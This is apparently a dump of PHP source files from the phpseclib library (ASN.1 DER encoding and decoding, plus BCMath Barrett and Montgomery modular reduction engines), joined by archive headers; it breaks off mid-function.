Application designers should therefore ensure that different semantics are not associated with such values which differ only in the number of trailing 0 bits." */ $bits = count($mapping['mapping']) == $size ? [] : array_fill(0, count($mapping['mapping']) - $size, false); for ($i = strlen($decoded['content']) - 1; $i > 0; $i--) { $current = ord($decoded['content'][$i]); for ($j = $offset; $j < 8; $j++) { $bits[] = (bool) ($current & (1 << $j)); } $offset = 0; } $values = []; $map = array_reverse($mapping['mapping']); foreach ($map as $i => $value) { if ($bits[$i]) { $values[] = $value; } } return $values; } // fall-through case self::TYPE_OCTET_STRING: return $decoded['content']; case self::TYPE_NULL: return ''; case self::TYPE_BOOLEAN: case self::TYPE_NUMERIC_STRING: case self::TYPE_PRINTABLE_STRING: case self::TYPE_TELETEX_STRING: case self::TYPE_VIDEOTEX_STRING: case self::TYPE_IA5_STRING: case self::TYPE_GRAPHIC_STRING: case self::TYPE_VISIBLE_STRING: case self::TYPE_GENERAL_STRING: case self::TYPE_UNIVERSAL_STRING: case self::TYPE_UTF8_STRING: case self::TYPE_BMP_STRING: return $decoded['content']; case self::TYPE_INTEGER: case self::TYPE_ENUMERATED: $temp = $decoded['content']; if (isset($mapping['implicit'])) { $temp = new BigInteger($decoded['content'], -256); } if (isset($mapping['mapping'])) { $temp = (int) $temp->toString(); return isset($mapping['mapping'][$temp]) ? $mapping['mapping'][$temp] : false; } return $temp; } } /** * DER-decode the length * * DER supports lengths up to (2**8)**127, however, we'll only support lengths up to (2**8)**4. See * {@link http://itu.int/ITU-T/studygroups/com17/languages/X.690-0207.pdf#p=13 X.690 paragraph 8.1.3} for more information. * * @param string $string * @return int */ public static function decodeLength(&$string) { $length = ord(Strings::shift($string)); if ($length & 0x80) { // definite length, long form $length &= 0x7F; $temp = Strings::shift($string, $length); list(, $length) = unpack('N', substr(str_pad($temp, 4, chr(0), STR_PAD_LEFT), -4)); } return $length; } /** * ASN.1 Encode * * DER-encodes an ASN.1 semantic mapping ($mapping). Some libraries would probably call this function * an ASN.1 compiler. * * "Special" mappings can be applied via $special. * * @param Element|string|array $source * @param array $mapping * @param array $special * @return string */ public static function encodeDER($source, $mapping, $special = []) { self::$location = []; return self::encode_der($source, $mapping, null, $special); } /** * ASN.1 Encode (Helper function) * * @param Element|string|array|null $source * @param array $mapping * @param int $idx * @param array $special * @return string */ private static function encode_der($source, array $mapping, $idx = null, array $special = []) { if ($source instanceof Element) { return $source->element; } // do not encode (implicitly optional) fields with value set to default if (isset($mapping['default']) && $source === $mapping['default']) { return ''; } if (isset($idx)) { if (isset($special[$idx])) { $source = $special[$idx]($source); } self::$location[] = $idx; } $tag = $mapping['type']; switch ($tag) { case self::TYPE_SET: // Children order is not important, thus process in sequence. case self::TYPE_SEQUENCE: $tag |= 0x20; // set the constructed bit // ignore the min and max if (isset($mapping['min']) && isset($mapping['max'])) { $value = []; $child = $mapping['children']; foreach ($source as $content) { $temp = self::encode_der($content, $child, null, $special); if ($temp === false) { return false; } $value[] = $temp; } /* "The encodings of the component values of a set-of value shall appear in ascending order, the encodings being compared as octet strings with the shorter components being padded at their trailing end with 0-octets. NOTE - The padding octets are for comparison purposes only and do not appear in the encodings." -- sec 11.6 of http://www.itu.int/ITU-T/studygroups/com17/languages/X.690-0207.pdf */ if ($mapping['type'] == self::TYPE_SET) { sort($value); } $value = implode('', $value); break; } $value = ''; foreach ($mapping['children'] as $key => $child) { if (!array_key_exists($key, $source)) { if (!isset($child['optional'])) { return false; } continue; } $temp = self::encode_der($source[$key], $child, $key, $special); if ($temp === false) { return false; } // An empty child encoding means it has been optimized out. // Else we should have at least one tag byte. if ($temp === '') { continue; } // if isset($child['constant']) is true then isset($child['optional']) should be true as well if (isset($child['constant'])) { /* From X.680-0207.pdf#page=58 (30.6): "The tagging construction specifies explicit tagging if any of the following holds: ... c) the "Tag Type" alternative is used and the value of "TagDefault" for the module is IMPLICIT TAGS or AUTOMATIC TAGS, but the type defined by "Type" is an untagged choice type, an untagged open type, or an untagged "DummyReference" (see ITU-T Rec. X.683 | ISO/IEC 8824-4, 8.3)." */ if (isset($child['explicit']) || $child['type'] == self::TYPE_CHOICE) { $subtag = chr((self::CLASS_CONTEXT_SPECIFIC << 6) | 0x20 | $child['constant']); $temp = $subtag . self::encodeLength(strlen($temp)) . $temp; } else { $subtag = chr((self::CLASS_CONTEXT_SPECIFIC << 6) | (ord($temp[0]) & 0x20) | $child['constant']); $temp = $subtag . substr($temp, 1); } } $value .= $temp; } break; case self::TYPE_CHOICE: $temp = false; foreach ($mapping['children'] as $key => $child) { if (!isset($source[$key])) { continue; } $temp = self::encode_der($source[$key], $child, $key, $special); if ($temp === false) { return false; } // An empty child encoding means it has been optimized out. // Else we should have at least one tag byte. if ($temp === '') { continue; } $tag = ord($temp[0]); // if isset($child['constant']) is true then isset($child['optional']) should be true as well if (isset($child['constant'])) { if (isset($child['explicit']) || $child['type'] == self::TYPE_CHOICE) { $subtag = chr((self::CLASS_CONTEXT_SPECIFIC << 6) | 0x20 | $child['constant']); $temp = $subtag . self::encodeLength(strlen($temp)) . $temp; } else { $subtag = chr((self::CLASS_CONTEXT_SPECIFIC << 6) | (ord($temp[0]) & 0x20) | $child['constant']); $temp = $subtag . substr($temp, 1); } } } if (isset($idx)) { array_pop(self::$location); } if ($temp && isset($mapping['cast'])) { $temp[0] = chr(($mapping['class'] << 6) | ($tag & 0x20) | $mapping['cast']); } return $temp; case self::TYPE_INTEGER: case self::TYPE_ENUMERATED: if (!isset($mapping['mapping'])) { if (is_numeric($source)) { $source = new BigInteger($source); } $value = $source->toBytes(true); } else { $value = array_search($source, $mapping['mapping']); if ($value === false) { return false; } $value = new BigInteger($value); $value = $value->toBytes(true); } if (!strlen($value)) { $value = chr(0); } break; case self::TYPE_UTC_TIME: case self::TYPE_GENERALIZED_TIME: $format = $mapping['type'] == self::TYPE_UTC_TIME ? 'y' : 'Y'; $format .= 'mdHis'; // if $source does _not_ include timezone information within it then assume that the timezone is GMT $date = new \DateTime($source, new \DateTimeZone('GMT')); // if $source _does_ include timezone information within it then convert the time to GMT $date->setTimezone(new \DateTimeZone('GMT')); $value = $date->format($format) . 'Z'; break; case self::TYPE_BIT_STRING: if (isset($mapping['mapping'])) { $bits = array_fill(0, count($mapping['mapping']), 0); $size = 0; for ($i = 0; $i < count($mapping['mapping']); $i++) { if (in_array($mapping['mapping'][$i], $source)) { $bits[$i] = 1; $size = $i; } } if (isset($mapping['min']) && $mapping['min'] >= 1 && $size < $mapping['min']) { $size = $mapping['min'] - 1; } $offset = 8 - (($size + 1) & 7); $offset = $offset !== 8 ? $offset : 0; $value = chr($offset); for ($i = $size + 1; $i < count($mapping['mapping']); $i++) { unset($bits[$i]); } $bits = implode('', array_pad($bits, $size + $offset + 1, 0)); $bytes = explode(' ', rtrim(chunk_split($bits, 8, ' '))); foreach ($bytes as $byte) { $value .= chr(bindec($byte)); } break; } // fall-through case self::TYPE_OCTET_STRING: /* The initial octet shall encode, as an unsigned binary integer with bit 1 as the least significant bit, the number of unused bits in the final subsequent octet. The number shall be in the range zero to seven. -- http://www.itu.int/ITU-T/studygroups/com17/languages/X.690-0207.pdf#page=16 */ $value = $source; break; case self::TYPE_OBJECT_IDENTIFIER: $value = self::encodeOID($source); break; case self::TYPE_ANY: $loc = self::$location; if (isset($idx)) { array_pop(self::$location); } switch (true) { case !isset($source): return self::encode_der(null, ['type' => self::TYPE_NULL] + $mapping, null, $special); case is_int($source): case $source instanceof BigInteger: return self::encode_der($source, ['type' => self::TYPE_INTEGER] + $mapping, null, $special); case is_float($source): return self::encode_der($source, ['type' => self::TYPE_REAL] + $mapping, null, $special); case is_bool($source): return self::encode_der($source, ['type' => self::TYPE_BOOLEAN] + $mapping, null, $special); case is_array($source) && count($source) == 1: $typename = implode('', array_keys($source)); $outtype = array_search($typename, self::ANY_MAP, true); if ($outtype !== false) { return self::encode_der($source[$typename], ['type' => $outtype] + $mapping, null, $special); } } $filters = self::$filters; foreach ($loc as $part) { if (!isset($filters[$part])) { $filters = false; break; } $filters = $filters[$part]; } if ($filters === false) { throw new \RuntimeException('No filters defined for ' . implode('/', $loc)); } return self::encode_der($source, $filters + $mapping, null, $special); case self::TYPE_NULL: $value = ''; break; case self::TYPE_NUMERIC_STRING: case self::TYPE_TELETEX_STRING: case self::TYPE_PRINTABLE_STRING: case self::TYPE_UNIVERSAL_STRING: case self::TYPE_UTF8_STRING: case self::TYPE_BMP_STRING: case self::TYPE_IA5_STRING: case self::TYPE_VISIBLE_STRING: case self::TYPE_VIDEOTEX_STRING: case self::TYPE_GRAPHIC_STRING: case self::TYPE_GENERAL_STRING: $value = $source; break; case self::TYPE_BOOLEAN: $value = $source ? "\xFF" : "\x00"; break; default: throw new \RuntimeException('Mapping provides no type definition for ' . implode('/', self::$location)); } if (isset($idx)) { array_pop(self::$location); } if (isset($mapping['cast'])) { if (isset($mapping['explicit']) || $mapping['type'] == self::TYPE_CHOICE) { $value = chr($tag) . self::encodeLength(strlen($value)) . $value; $tag = ($mapping['class'] << 6) | 0x20 | $mapping['cast']; } else { $tag = ($mapping['class'] << 6) | (ord($temp[0]) & 0x20) | $mapping['cast']; } } return chr($tag) . self::encodeLength(strlen($value)) . $value; } /** * BER-decode the OID * * Called by _decode_ber() * * @param string $content * @return string */ public static function decodeOID($content) { static $eighty; if (!$eighty) { $eighty = new BigInteger(80); } $oid = []; $pos = 0; $len = strlen($content); if (ord($content[$len - 1]) & 0x80) { return false; } $n = new BigInteger(); while ($pos < $len) { $temp = ord($content[$pos++]); $n = $n->bitwise_leftShift(7); $n = $n->bitwise_or(new BigInteger($temp & 0x7F)); if (~$temp & 0x80) { $oid[] = $n; $n = new BigInteger(); } } $part1 = array_shift($oid); $first = floor(ord($content[0]) / 40); /* "This packing of the first two object identifier components recognizes that only three values are allocated from the root node, and at most 39 subsequent values from nodes reached by X = 0 and X = 1." -- https://www.itu.int/ITU-T/studygroups/com17/languages/X.690-0207.pdf#page=22 */ if ($first <= 2) { // ie. 0 <= ord($content[0]) < 120 (0x78) array_unshift($oid, ord($content[0]) % 40); array_unshift($oid, $first); } else { array_unshift($oid, $part1->subtract($eighty)); array_unshift($oid, 2); } return implode('.', $oid); } /** * DER-encode the OID * * Called by _encode_der() * * @param string $source * @return string */ public static function encodeOID($source) { static $mask, $zero, $forty; if (!$mask) { $mask = new BigInteger(0x7F); $zero = new BigInteger(); $forty = new BigInteger(40); } if (!preg_match('#(?:\d+\.)+#', $source)) { $oid = isset(self::$reverseOIDs[$source]) ? self::$reverseOIDs[$source] : false; } else { $oid = $source; } if ($oid === false) { throw new \RuntimeException('Invalid OID'); } $parts = explode('.', $oid); $part1 = array_shift($parts); $part2 = array_shift($parts); $first = new BigInteger($part1); $first = $first->multiply($forty); $first = $first->add(new BigInteger($part2)); array_unshift($parts, $first->toString()); $value = ''; foreach ($parts as $part) { if (!$part) { $temp = "\0"; } else { $temp = ''; $part = new BigInteger($part); while (!$part->equals($zero)) { $submask = $part->bitwise_and($mask); $submask->setPrecision(8); $temp = (chr(0x80) | $submask->toBytes()) . $temp; $part = $part->bitwise_rightShift(7); } $temp[strlen($temp) - 1] = $temp[strlen($temp) - 1] & chr(0x7F); } $value .= $temp; } return $value; } /** * BER-decode the time * * Called by _decode_ber() and in the case of implicit tags asn1map(). * * @param string $content * @param int $tag * @return \DateTime|false */ private static function decodeTime($content, $tag) { /* UTCTime: http://tools.ietf.org/html/rfc5280#section- http://www.obj-sys.com/asn1tutorial/node15.html GeneralizedTime: http://tools.ietf.org/html/rfc5280#section- http://www.obj-sys.com/asn1tutorial/node14.html */ $format = 'YmdHis'; if ($tag == self::TYPE_UTC_TIME) { // https://www.itu.int/ITU-T/studygroups/com17/languages/X.690-0207.pdf#page=28 says "the seconds // element shall always be present" but none-the-less I've seen X509 certs where it isn't and if the // browsers parse it phpseclib ought to too if (preg_match('#^(\d{10})(Z|[+-]\d{4})$#', $content, $matches)) { $content = $matches[1] . '00' . $matches[2]; } $prefix = substr($content, 0, 2) >= 50 ? '19' : '20'; $content = $prefix . $content; } elseif (strpos($content, '.') !== false) { $format .= '.u'; } if ($content[strlen($content) - 1] == 'Z') { $content = substr($content, 0, -1) . '+0000'; } if (strpos($content, '-') !== false || strpos($content, '+') !== false) { $format .= 'O'; } // error supression isn't necessary as of PHP 7.0: // http://php.net/manual/en/migration70.other-changes.php return @\DateTime::createFromFormat($format, $content); } /** * Set the time format * * Sets the time / date format for asn1map(). * * @param string $format */ public static function setTimeFormat($format) { self::$format = $format; } /** * Load OIDs * * Load the relevant OIDs for a particular ASN.1 semantic mapping. * Previously loaded OIDs are retained. * * @param array $oids */ public static function loadOIDs(array $oids) { self::$reverseOIDs += $oids; self::$oids = array_flip(self::$reverseOIDs); } /** * Set filters * * See \phpseclib3\File\X509, etc, for an example. * Previously loaded filters are not retained. * * @param array $filters */ public static function setFilters(array $filters) { self::$filters = $filters; } /** * String type conversion * * This is a lazy conversion, dealing only with character size. * No real conversion table is used. * * @param string $in * @param int $from * @param int $to * @return string */ public static function convert($in, $from = self::TYPE_UTF8_STRING, $to = self::TYPE_UTF8_STRING) { // isset(self::STRING_TYPE_SIZE[$from] returns a fatal error on PHP 5.6 if (!array_key_exists($from, self::STRING_TYPE_SIZE) || !array_key_exists($to, self::STRING_TYPE_SIZE)) { return false; } $insize = self::STRING_TYPE_SIZE[$from]; $outsize = self::STRING_TYPE_SIZE[$to]; $inlength = strlen($in); $out = ''; for ($i = 0; $i < $inlength;) { if ($inlength - $i < $insize) { return false; } // Get an input character as a 32-bit value. $c = ord($in[$i++]); switch (true) { case $insize == 4: $c = ($c << 8) | ord($in[$i++]); $c = ($c << 8) | ord($in[$i++]); // fall-through case $insize == 2: $c = ($c << 8) | ord($in[$i++]); // fall-through case $insize == 1: break; case ($c & 0x80) == 0x00: break; case ($c & 0x40) == 0x00: return false; default: $bit = 6; do { if ($bit > 25 || $i >= $inlength || (ord($in[$i]) & 0xC0) != 0x80) { return false; } $c = ($c << 6) | (ord($in[$i++]) & 0x3F); $bit += 5; $mask = 1 << $bit; } while ($c & $bit); $c &= $mask - 1; break; } // Convert and append the character to output string. $v = ''; switch (true) { case $outsize == 4: $v .= chr($c & 0xFF); $c >>= 8; $v .= chr($c & 0xFF); $c >>= 8; // fall-through case $outsize == 2: $v .= chr($c & 0xFF); $c >>= 8; // fall-through case $outsize == 1: $v .= chr($c & 0xFF); $c >>= 8; if ($c) { return false; } break; case ($c & (PHP_INT_SIZE == 8 ? 0x80000000 : (1 << 31))) != 0: return false; case $c >= 0x04000000: $v .= chr(0x80 | ($c & 0x3F)); $c = ($c >> 6) | 0x04000000; // fall-through case $c >= 0x00200000: $v .= chr(0x80 | ($c & 0x3F)); $c = ($c >> 6) | 0x00200000; // fall-through case $c >= 0x00010000: $v .= chr(0x80 | ($c & 0x3F)); $c = ($c >> 6) | 0x00010000; // fall-through case $c >= 0x00000800: $v .= chr(0x80 | ($c & 0x3F)); $c = ($c >> 6) | 0x00000800; // fall-through case $c >= 0x00000080: $v .= chr(0x80 | ($c & 0x3F)); $c = ($c >> 6) | 0x000000C0; // fall-through default: $v .= chr($c); break; } $out .= strrev($v); } return $out; } /** * Extract raw BER from Base64 encoding * * @param string $str * @return string */ public static function extractBER($str) { /* X.509 certs are assumed to be base64 encoded but sometimes they'll have additional things in them * above and beyond the ceritificate. * ie. some may have the following preceding the -----BEGIN CERTIFICATE----- line: * * Bag Attributes * localKeyID: 01 00 00 00 * subject=/O=organization/OU=org unit/CN=common name * issuer=/O=organization/CN=common name */ if (strlen($str) > ini_get('pcre.backtrack_limit')) { $temp = $str; } else { $temp = preg_replace('#.*?^-+[^-]+-+[\r\n ]*$#ms', '', $str, 1); $temp = preg_replace('#-+END.*[\r\n ]*.*#ms', '', $temp, 1); } // remove new lines $temp = str_replace(["\r", "\n", ' '], '', $temp); // remove the -----BEGIN CERTIFICATE----- and -----END CERTIFICATE----- stuff $temp = preg_replace('#^-+[^-]+-+|-+[^-]+-+$#', '', $temp); $temp = preg_match('#^[a-zA-Z\d/+]*={0,2}$#', $temp) ? Strings::base64_decode($temp) : false; return $temp != false ? $temp : $str; } /** * DER-encode the length * * DER supports lengths up to (2**8)**127, however, we'll only support lengths up to (2**8)**4. See * {@link http://itu.int/ITU-T/studygroups/com17/languages/X.690-0207.pdf#p=13 X.690 paragraph 8.1.3} for more information. * * @param int $length * @return string */ public static function encodeLength($length) { if ($length <= 0x7F) { return chr($length); } $temp = ltrim(pack('N', $length), chr(0)); return pack('Ca*', 0x80 | strlen($temp), $temp); } /** * Returns the OID corresponding to a name * * What's returned in the associative array returned by loadX509() (or load*()) is either a name or an OID if * no OID to name mapping is available. The problem with this is that what may be an unmapped OID in one version * of phpseclib may not be unmapped in the next version, so apps that are looking at this OID may not be able * to work from version to version. * * This method will return the OID if a name is passed to it and if no mapping is avialable it'll assume that * what's being passed to it already is an OID and return that instead. A few examples. * * getOID('2.16.840.') == '2.16.840.' * getOID('id-sha256') == '2.16.840.' * getOID('zzz') == 'zzz' * * @param string $name * @return string */ public static function getOID($name) { return isset(self::$reverseOIDs[$name]) ? self::$reverseOIDs[$name] : $name; } } vendor/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/BCMath/Reductions/EvalBarrett.php000064400000005502147600400120030335 0ustar00google-api * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Math\BigInteger\Engines\BCMath\Reductions; use phpseclib3\Math\BigInteger\Engines\BCMath; use phpseclib3\Math\BigInteger\Engines\BCMath\Base; /** * PHP Barrett Modular Exponentiation Engine * * @author Jim Wigginton */ abstract class EvalBarrett extends Base { /** * Custom Reduction Function * * @see self::generateCustomReduction */ private static $custom_reduction; /** * Barrett Modular Reduction * * This calls a dynamically generated loop unrolled function that's specific to a given modulo. * Array lookups are avoided as are if statements testing for how many bits the host OS supports, etc. * * @param string $n * @param string $m * @return string */ protected static function reduce($n, $m) { $inline = self::$custom_reduction; return $inline($n); } /** * Generate Custom Reduction * * @param BCMath $m * @param string $class * @return callable|void */ protected static function generateCustomReduction(BCMath $m, $class) { $m_length = strlen($m); if ($m_length < 5) { $code = 'return bcmod($x, $n);'; eval('$func = function ($n) { ' . $code . '};'); self::$custom_reduction = $func; return; } $lhs = '1' . str_repeat('0', $m_length + ($m_length >> 1)); $u = bcdiv($lhs, $m, 0); $m1 = bcsub($lhs, bcmul($u, $m)); $cutoff = $m_length + ($m_length >> 1); $m = "'$m'"; $u = "'$u'"; $m1 = "'$m1'"; $code = ' $lsd = substr($n, -' . $cutoff . '); $msd = substr($n, 0, -' . $cutoff . '); $temp = bcmul($msd, ' . $m1 . '); $n = bcadd($lsd, $temp); $temp = substr($n, 0, ' . (-$m_length + 1) . '); $temp = bcmul($temp, ' . $u . '); $temp = substr($temp, 0, ' . (-($m_length >> 1) - 1) . '); $temp = bcmul($temp, ' . $m . '); $result = bcsub($n, $temp); if ($result[0] == \'-\') { $temp = \'1' . str_repeat('0', $m_length + 1) . '\'; $result = bcadd($result, $temp); } while (bccomp($result, ' . $m . ') >= 0) { $result = bcsub($result, ' . $m . '); } return $result;'; eval('$func = function ($n) { ' . $code . '};'); self::$custom_reduction = $func; return $func; } } vendor/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/BCMath/Reductions/Barrett.php000064400000015021147600400120027522 0ustar00google-api * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Math\BigInteger\Engines\BCMath\Reductions; use phpseclib3\Math\BigInteger\Engines\BCMath\Base; /** * PHP Barrett Modular Exponentiation Engine * * @author Jim Wigginton */ abstract class Barrett extends Base { /** * Cache constants * * $cache[self::VARIABLE] tells us whether or not the cached data is still valid. * */ const VARIABLE = 0; /** * $cache[self::DATA] contains the cached data. * */ const DATA = 1; /** * Barrett Modular Reduction * * See {@link http://www.cacr.math.uwaterloo.ca/hac/about/chap14.pdf#page=14 HAC 14.3.3} / * {@link http://math.libtomcrypt.com/files/tommath.pdf#page=165 MPM 6.2.5} for more information. Modified slightly, * so as not to require negative numbers (initially, this script didn't support negative numbers). * * Employs "folding", as described at * {@link http://www.cosic.esat.kuleuven.be/publications/thesis-149.pdf#page=66 thesis-149.pdf#page=66}. To quote from * it, "the idea [behind folding] is to find a value x' such that x (mod m) = x' (mod m), with x' being smaller than x." * * Unfortunately, the "Barrett Reduction with Folding" algorithm described in thesis-149.pdf is not, as written, all that * usable on account of (1) its not using reasonable radix points as discussed in * {@link http://math.libtomcrypt.com/files/tommath.pdf#page=162 MPM 6.2.2} and (2) the fact that, even with reasonable * radix points, it only works when there are an even number of digits in the denominator. The reason for (2) is that * (x >> 1) + (x >> 1) != x / 2 + x / 2. If x is even, they're the same, but if x is odd, they're not. See the in-line * comments for details. * * @param string $n * @param string $m * @return string */ protected static function reduce($n, $m) { static $cache = [ self::VARIABLE => [], self::DATA => [] ]; $m_length = strlen($m); if (strlen($n) > 2 * $m_length) { return bcmod($n, $m); } // if (m.length >> 1) + 2 <= m.length then m is too small and n can't be reduced if ($m_length < 5) { return self::regularBarrett($n, $m); } // n = 2 * m.length if (($key = array_search($m, $cache[self::VARIABLE])) === false) { $key = count($cache[self::VARIABLE]); $cache[self::VARIABLE][] = $m; $lhs = '1' . str_repeat('0', $m_length + ($m_length >> 1)); $u = bcdiv($lhs, $m, 0); $m1 = bcsub($lhs, bcmul($u, $m)); $cache[self::DATA][] = [ 'u' => $u, // m.length >> 1 (technically (m.length >> 1) + 1) 'm1' => $m1 // m.length ]; } else { extract($cache[self::DATA][$key]); } $cutoff = $m_length + ($m_length >> 1); $lsd = substr($n, -$cutoff); $msd = substr($n, 0, -$cutoff); $temp = bcmul($msd, $m1); // m.length + (m.length >> 1) $n = bcadd($lsd, $temp); // m.length + (m.length >> 1) + 1 (so basically we're adding two same length numbers) //if ($m_length & 1) { // return self::regularBarrett($n, $m); //} // (m.length + (m.length >> 1) + 1) - (m.length - 1) == (m.length >> 1) + 2 $temp = substr($n, 0, -$m_length + 1); // if even: ((m.length >> 1) + 2) + (m.length >> 1) == m.length + 2 // if odd: ((m.length >> 1) + 2) + (m.length >> 1) == (m.length - 1) + 2 == m.length + 1 $temp = bcmul($temp, $u); // if even: (m.length + 2) - ((m.length >> 1) + 1) = m.length - (m.length >> 1) + 1 // if odd: (m.length + 1) - ((m.length >> 1) + 1) = m.length - (m.length >> 1) $temp = substr($temp, 0, -($m_length >> 1) - 1); // if even: (m.length - (m.length >> 1) + 1) + m.length = 2 * m.length - (m.length >> 1) + 1 // if odd: (m.length - (m.length >> 1)) + m.length = 2 * m.length - (m.length >> 1) $temp = bcmul($temp, $m); // at this point, if m had an odd number of digits, we'd be subtracting a 2 * m.length - (m.length >> 1) digit // number from a m.length + (m.length >> 1) + 1 digit number. ie. there'd be an extra digit and the while loop // following this comment would loop a lot (hence our calling _regularBarrett() in that situation). $result = bcsub($n, $temp); //if (bccomp($result, '0') < 0) { if ($result[0] == '-') { $temp = '1' . str_repeat('0', $m_length + 1); $result = bcadd($result, $temp); } while (bccomp($result, $m) >= 0) { $result = bcsub($result, $m); } return $result; } /** * (Regular) Barrett Modular Reduction * * For numbers with more than four digits BigInteger::_barrett() is faster. The difference between that and this * is that this function does not fold the denominator into a smaller form. * * @param string $x * @param string $n * @return string */ private static function regularBarrett($x, $n) { static $cache = [ self::VARIABLE => [], self::DATA => [] ]; $n_length = strlen($n); if (strlen($x) > 2 * $n_length) { return bcmod($x, $n); } if (($key = array_search($n, $cache[self::VARIABLE])) === false) { $key = count($cache[self::VARIABLE]); $cache[self::VARIABLE][] = $n; $lhs = '1' . str_repeat('0', 2 * $n_length); $cache[self::DATA][] = bcdiv($lhs, $n, 0); } $temp = substr($x, 0, -$n_length + 1); $temp = bcmul($temp, $cache[self::DATA][$key]); $temp = substr($temp, 0, -$n_length - 1); $r1 = substr($x, -$n_length - 1); $r2 = substr(bcmul($temp, $n), -$n_length - 1); $result = bcsub($r1, $r2); //if (bccomp($result, '0') < 0) { if ($result[0] == '-') { $q = '1' . str_repeat('0', $n_length + 1); $result = bcadd($result, $q); } while (bccomp($result, $n) >= 0) { $result = bcsub($result, $n); } return $result; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/BCMath/OpenSSL.php000064400000001067147600400120025347 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Math\BigInteger\Engines\BCMath; use phpseclib3\Math\BigInteger\Engines\OpenSSL as Progenitor; /** * OpenSSL Modular Exponentiation Engine * * @author Jim Wigginton */ abstract class OpenSSL extends Progenitor { } google-api/vendor/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/BCMath/BuiltIn.php000064400000001657147600400120025437 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Math\BigInteger\Engines\BCMath; use phpseclib3\Math\BigInteger\Engines\BCMath; /** * Built-In BCMath Modular Exponentiation Engine * * @author Jim Wigginton */ abstract class BuiltIn extends BCMath { /** * Performs modular exponentiation. * * @param BCMath $x * @param BCMath $e * @param BCMath $n * @return BCMath */ protected static function powModHelper(BCMath $x, BCMath $e, BCMath $n) { $temp = new BCMath(); $temp->value = bcpowmod($x->value, $e->value, $n->value); return $x->normalize($temp); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/BCMath/DefaultEngine.php000064400000001111147600400120026564 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Math\BigInteger\Engines\BCMath; use phpseclib3\Math\BigInteger\Engines\BCMath\Reductions\Barrett; /** * PHP Default Modular Exponentiation Engine * * @author Jim Wigginton */ abstract class DefaultEngine extends Barrett { } google-api/vendor/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/BCMath/Base.php000064400000004547147600400120024744 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Math\BigInteger\Engines\BCMath; use phpseclib3\Math\BigInteger\Engines\BCMath; /** * Sliding Window Exponentiation Engine * * @author Jim Wigginton */ abstract class Base extends BCMath { /** * Cache constants * * $cache[self::VARIABLE] tells us whether or not the cached data is still valid. * */ const VARIABLE = 0; /** * $cache[self::DATA] contains the cached data. * */ const DATA = 1; /** * Test for engine validity * * @return bool */ public static function isValidEngine() { return static::class != __CLASS__; } /** * Performs modular exponentiation. * * @param BCMath $x * @param BCMath $e * @param BCMath $n * @param string $class * @return BCMath */ protected static function powModHelper(BCMath $x, BCMath $e, BCMath $n, $class) { if (empty($e->value)) { $temp = new $class(); $temp->value = '1'; return $x->normalize($temp); } return $x->normalize(static::slidingWindow($x, $e, $n, $class)); } /** * Modular reduction preparation * * @param string $x * @param string $n * @param string $class * @see self::slidingWindow() * @return string */ protected static function prepareReduce($x, $n, $class) { return static::reduce($x, $n); } /** * Modular multiply * * @param string $x * @param string $y * @param string $n * @param string $class * @see self::slidingWindow() * @return string */ protected static function multiplyReduce($x, $y, $n, $class) { return static::reduce(bcmul($x, $y), $n); } /** * Modular square * * @param string $x * @param string $n * @param string $class * @see self::slidingWindow() * @return string */ protected static function squareReduce($x, $n, $class) { return static::reduce(bcmul($x, $x), $n); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/GMP/DefaultEngine.php000064400000001574147600400120026126 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Math\BigInteger\Engines\GMP; use phpseclib3\Math\BigInteger\Engines\GMP; /** * GMP Modular Exponentiation Engine * * @author Jim Wigginton */ abstract class DefaultEngine extends GMP { /** * Performs modular exponentiation. * * @param GMP $x * @param GMP $e * @param GMP $n * @return GMP */ protected static function powModHelper(GMP $x, GMP $e, GMP $n) { $temp = new GMP(); $temp->value = gmp_powm($x->value, $e->value, $n->value); return $x->normalize($temp); } } vendor/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/PHP/Reductions/MontgomeryMult.php000064400000005557147600400120030467 0ustar00google-api * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Math\BigInteger\Engines\PHP\Reductions; use phpseclib3\Math\BigInteger\Engines\PHP; /** * PHP Montgomery Modular Exponentiation Engine with interleaved multiplication * * @author Jim Wigginton */ abstract class MontgomeryMult extends Montgomery { /** * Montgomery Multiply * * Interleaves the montgomery reduction and long multiplication algorithms together as described in * {@link http://www.cacr.math.uwaterloo.ca/hac/about/chap14.pdf#page=13 HAC 14.36} * * @see self::_prepMontgomery() * @see self::_montgomery() * @param array $x * @param array $y * @param array $m * @param class-string $class * @return array */ public static function multiplyReduce(array $x, array $y, array $m, $class) { // the following code, although not callable, can be run independently of the above code // although the above code performed better in my benchmarks the following could might // perform better under different circumstances. in lieu of deleting it it's just been // made uncallable static $cache = [ self::VARIABLE => [], self::DATA => [] ]; if (($key = array_search($m, $cache[self::VARIABLE])) === false) { $key = count($cache[self::VARIABLE]); $cache[self::VARIABLE][] = $m; $cache[self::DATA][] = self::modInverse67108864($m, $class); } $n = max(count($x), count($y), count($m)); $x = array_pad($x, $n, 0); $y = array_pad($y, $n, 0); $m = 